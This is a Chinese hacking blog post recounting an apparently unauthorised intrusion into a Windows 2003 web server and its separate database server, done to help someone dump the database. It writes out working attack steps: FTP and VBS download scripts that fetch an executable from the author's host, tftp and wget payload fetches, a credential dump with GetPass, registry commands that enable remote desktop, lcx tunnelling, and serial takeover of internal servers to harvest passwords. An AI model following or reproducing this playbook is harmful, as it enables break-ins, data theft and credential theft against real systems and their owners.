0x00 提權環境
這是一機油來問我如何脫褲~~~
然后就試試提權
看了下端口,就開了80和3389
Windows 2003 x86
既然脫褲,就可想而知肯定有數據庫
由圖可知該例是站庫分離,當時我還傻乎乎的拿着sa去執行添加用戶命令
結果連不上~~~肯定連不上撒!!!
好吧,思路有以下幾條:
一、 不管這配置文件,直接在原服務器上進行提權
二、 先利用sa拿下內網服務器然后再拿下原服務器
首先試試第一條~~
0x01 原服務器上提權
無常用的第三方軟件,只有從溢出下手。
悲劇的是基本所有溢出都是這樣,要么被殺(麥咖啡看門),要么就是執行不了。
好吧,丟了個lpk.dll上去~~~繼續下面的思路吧。
0x02 先拿下內網服務器
拿內網服務器一共也有條思路~~~
第一、不用拿下服務器,直接讀取hash,然后解密,看看是否內網機器都共用該密碼~~~
第二、利用lcx轉發工具拿下服務器,然后再在服務器中收集信息
但是以上兩個思路都需要一個東西,就是要上傳文件至數據庫服務器上。
如何上傳文件到服務器上?
思路有很多,我就介紹常用的三種
第一種、利用cmd命令調用ftp(或者tftp)上傳文件(1433傳馬原理)
第二種、利用sql語句進行建立臨時表寫入數據然后導出數據
第三種、vbs腳本上傳
首先第一種(可能機油就會問為什么不用echo命令寫文件到服務器中~~~~echo只能一句句寫而且遇到>或者>>符號時就會自動停止,所以不用echo寫~~)
首先在本機上搭建ftp服務器
配置如下:
選擇文件夾,文件夾中有需要上傳的文件1.txt
利用cmd寫命令,一句一句的執行。
echo open 223.85.31.141>>test.txt登陸ftp服務器,223.85.31.141為本機ip
echo test>>test.txt寫入用戶名
echo test>>test.txt寫入密碼
echo bin>>test.txt相當於enter,就是開始的意思
echo get 1.txt>>test.txt下載ftp服務器中的1.txt
echo bye>>test.txt關閉ftp服務器
cmd執行完畢。
然后利用type命令查看test.txt中的文件信息
type test.txt
---------------------------------------------------------------------------------------------------------------
open 223.85.31.141
test
test
bin
get 1.txt
如圖:
成功寫入
下面就調用ftp命令進行下載執行這些命令~~~~
在本機測試結果如下:
----------------------------------------------------------------------------------------------------------------------------
ftp -s:test.txt
ftp> open 223.85.31.141
連接到 223.85.31.141。
220 Welcome to SUS FTP Server
用戶(223.85.31.141:(none)):
331 Password required for test
230 Logged on
ftp> bin
200 Type set to I
ftp> get 1.txt
200 Port command successful
150 Opening data channel for file transfer.
226 Transfer complete
ftp: 收到 11 字節,用時 0.00秒 11.00千字節/秒。
ftp> bye
220 Bye
---------------------------------------------------------------------------------------------------------------------
悲劇的是在服務器上執行時,卻是下面命令:
---------------------------------------------------------------------------------------------------------------------
'ftp' 不是內部或外部命令,也不是可運行的程序
或批處理文件。
---------------------------------------------------------------------------------------------------------------------
由此可知原因大概就是ftp.exe被刪除,或者有什么牛B的東西看門。
下面走第二個思路就是利用sql語句進行寫入和導出~~~
本來還想好好寫寫存儲過程的sql語句,本人就比較懶,就想在網上找找有木有直接利用腳本完成文件上傳。
別說運氣還真好,真找到一個Sa-Upfile 1.0(sa權限上傳文件)
使用環境:SQL2000,SA權限,常用提權擴展存在。
原理:利用textcopy進行二進制導入導出。
好吧,試試看。
確實很好用,果斷成功~~~~~
看來菜鳥真的是菜鳥,這就是傳說中的saupfile組建~~~~
但是原理還是看看這篇文章:
如何通過SQL SERVER遠程上傳文件的實現
這里還是補充下用vbs下載文件和tftp下載~~就如上面一樣,一旦管理員刪除ftp.exe
就無法達到上傳的目的
VBS下載文件
但是腳本的強大就在這里體現~~~~
腳本上傳只需要ADODB.Stream的支持,windows系統默認是支持的。
上傳腳本如下(同樣是cmd執行如下命令):
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://f4ck.yueyan.net/yueyan.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"C:\yueyan.exe^",2 >down.vbs
然后執行cscript down.vbs就可以完成下載。
Tftp下載:
Tftp下載應該是這當中最簡單的上傳方式,為什么我會最后提,並且我並不推薦tftp上傳。
只是為大家介紹一下就行了。
原因就是tftp是基於udp協議,了解udp和tc/ip協議的人都應該知道udp協議設計就是為了傳輸少量數據。QQ聊天消息就是基於這個協議。所以只能傳輸小文件,當然傳輸一個wget還是毫無壓力的~~~~但是有時候會存在一些殺毒軟件會阻止該傳輸過程~~所以不建議。
說說利用方法:首先現在本機大家tftp服務器
然后在服務器上執行命令,一條就夠了
tftp-I <your ip> get yueyan.exe path/yueyan.exe
例如我要下載yueyan.exe到c盤根目錄,就執行
tftp–I 110.110.110.110 get yueyan.exe c:/yueyan.exe
就這么簡單,如果不加路徑默認是system32這個目錄。
如果下載文件比較多,建議上傳一個wget.exe
命令如下:
Wgethttp://f4ck.yueyan.com/yueyan.exe
這樣上傳其他文件就方便了
首先先用GetPass.exe直接抓取明文密碼
------------------------------------------------------------------------------------------------------------------------------
UserName: Administrator
LogonDomain: WIN-QUB8GLT3HKB
password:000
--------------------------------------------------------------------------------------------------------------------------------
要不要這樣~~~~000,這么在原服務器上試了試。
登陸不上,好吧我承認我今天踩死了一只打屁蟲~~~
這個很好解決.先看服務器是否開啟3389
用netstat–an查看木有開啟3389,又用cmd查看遠程終端:
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
由於系統權限,可以直接命令開啟
開啟3389:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
開完之后直接轉發就ok了~~
本機執行lcx -listen 51 33891
服務器執行lcx–slave 223.85.31.141 51 127.0.0.1 3389
連接127.0.0.1:33891
好吧~~~終於進去了~~~
0x03 從內網慢慢來拿原服務器
拿下一台服務器現在祭出我的神器~~~h-scan
再祭出神器二~~~sqltool
一個個的提權~~~~
瘋狂的拿服務器~~~~拿服務器是為什么呢?收集信息嘛~~
拿一個服務器,抓一個服務器的密碼~~~~
得到好幾個密碼~~~~
然后再到本機上登陸
成功登陸
從實際來講拿這個服務器並無實際的原因,就是想提權~~~